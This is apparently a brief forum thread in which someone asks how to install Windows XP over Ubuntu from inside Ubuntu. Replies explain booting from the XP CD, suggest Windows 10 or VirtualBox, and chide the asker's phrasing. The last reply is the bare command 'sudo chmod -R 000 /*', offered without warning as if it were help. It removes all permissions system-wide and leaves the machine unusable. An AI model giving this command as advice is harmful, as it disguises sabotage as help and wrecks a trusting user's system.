DK_BLEU

Hello, I need to know how to install windows xp over Ubuntu from within Ubuntu. My CD drive is not showing up in the install screen of the bios so i have no other choice but to do it from within Ubuntu. Thanks in advance.

You can't.

You will have to boot from the Windows xp cd when the computer boots instead of Ubuntu. It will erase the drive.

Installing xp is also a waste of time, you can run windows 10 for free just deactivated, and it has backwards compatability with most xp programs.

This, or you could run a virtual machine with virtualbox.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
